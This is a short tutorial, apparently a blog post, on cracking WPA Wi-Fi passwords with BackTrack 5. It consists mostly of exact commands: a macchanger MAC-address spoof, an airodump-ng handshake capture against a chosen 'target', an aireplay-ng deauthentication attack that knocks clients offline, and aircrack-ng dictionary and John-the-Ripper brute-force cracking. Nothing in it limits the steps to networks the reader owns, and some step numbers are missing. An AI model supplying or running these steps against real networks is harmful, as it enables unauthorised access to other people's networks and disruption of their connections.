Step 1 – Boot into BackTrack 5
Step 2 – Open up a Terminal window which is a command line utility built into BackTrack 5. It is the Black Box on the top menu (if you’re using the Gnome version of Backtrack)
Step 3 – Enter the following commands into the command line
- airmon-ng stop wlan0
- ifconfig wlan0 down
- macchanger –mac 00:11:22:33:44:55 wlan0
- airmon-ng start wlan0
These commands stop the wireless interface so that you can change
the MAC Address of your wireless card (in this case we are changing it
to 00:11:22:33:44:55) and restarts the cards using the new MAC address
Step 4 – We will put the airodump-ng tool into monitor mode, this will allow us to see all of the wireless networks around us.- airodump-ng mon0
*Note* – The PWR has to be fairly high to be able to hack it, this is determined by how close you are to the wireless router. The closer you are, the better.
Step 6 – Once you have chosen your target enter the following commands:
- airodump-ng mon0 –channel * –bssid **:**:**:**:**:** -w filename
Once “WPA handshake: **:**:**:**:**:**” appears in the top right-hand corner we can move on. If you are having trouble getting the WPA handshake to occur then proceed to Step 7 otherwise continue to Step 8.
Step 7 – Enter the command below to deauthorize a wireless connection and try to re-establish it so it will generate a new handshake to capture. This step ends once you have captured the handshake
- aireplay-ng -0 1 -a **:**:**:**:**:** -c **:**:**:**:**:** mon0
- aircrack-ng –w wordlist.lst -b **:**:**:**:**:** filename.cap
Step 9 - If the password isn’t found in the dictionary you can try and brute-force the password with this command: (Note this could take a very long time depending on their password strength).
- /pentest/password/jtr/john –stdout –incremental:all | aircrack-ng -b **:**:**:**:**:** -w – filename.cap
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